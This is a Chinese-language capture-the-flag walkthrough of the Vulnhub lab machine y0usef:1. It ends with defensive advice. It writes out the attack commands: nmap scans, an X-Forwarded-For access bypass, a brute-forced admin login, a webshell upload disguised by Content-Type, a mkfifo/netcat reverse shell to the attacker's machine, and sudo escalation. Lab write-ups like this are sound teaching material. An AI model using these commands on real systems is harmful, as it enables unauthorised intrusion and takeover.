Vulnhub y0usef: 1
字数 938 2025-08-15 21:33:46
Vulnhub靶机y0usef:1渗透测试教学文档
靶机基本信息
- 难度等级:简单
- 下载链接:https://www.vulnhub.com/entry/y0usef-1,624/
- 特点:需要一定想象力,操作相对容易
环境准备
- 将靶机镜像导入虚拟化平台
- 确保攻击机(Kali Linux)与靶机在同一网段
渗透测试步骤
1. 主机发现
nmap 192.168.56.0/24
- 发现靶机IP: 192.168.56.105
2. 端口扫描与服务识别
nmap -sV -p- -A 192.168.56.105
- 开放端口:
- 22/tcp - SSH
- 80/tcp - HTTP
3. Web应用枚举
目录扫描
dirb http://192.168.56.105
- 初始扫描可能无结果
使用dirsearch发现301重定向:
dirsearch -u http://192.168.56.105
绕过访问限制
- 添加请求头实现重定向:
X-Forwarded-For: 127.0.0.1 - 使用Burp Suite拦截请求并添加该头部
4. 登录页面渗透
- 发现登录页面
- 使用Burp Suite进行暴力破解
- 使用top100字典
- 成功破解凭证:
- 用户名:admin
- 密码:admin
5. 文件上传漏洞利用
- 尝试上传PHP webshell
- 发现直接上传.php文件被过滤
- 使用Burp修改上传请求:
- 修改Content-Type为image/png
- 上传成功路径:
http://192.168.56.105/adminstration/upload/files/16127499112.php - 使用哥斯拉(Godzilla)连接webshell
6. 获取反向Shell
- 通过webshell执行命令:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 1234>/tmp/f
- 在攻击机监听:
nc -lvnp 1234
- 升级为交互式shell:
python -c 'import pty;pty.spawn("/bin/bash")'
7. 本地信息收集
- 在/home目录发现user.txt
- 内容为base64编码,解码后获得:
- 用户名:yousef
- 密码:yousef123
8. SSH稳定连接
ssh yousef@192.168.56.105
9. 权限提升
- 检查sudo权限:
sudo -l
- 发现yousef可以执行所有命令
- 直接提权:
sudo su
- 或:
sudo -i
10. 获取最终flag
- 进入/root目录
- 查看flag文件并解码
关键知识点总结
- 主机发现:使用nmap进行网络扫描
- 目录枚举:当标准字典无效时尝试不同工具
- 访问控制绕过:X-Forwarded-For头部利用
- 弱凭证利用:常见默认凭证测试
- 文件上传绕过:Content-Type修改技术
- 反向Shell建立:使用nc建立稳定连接
- 权限提升:sudo权限滥用
防御建议
- 禁用默认/弱凭证
- 实施严格的文件上传验证
- 限制sudo权限
- 监控异常HTTP头部
- 定期进行安全审计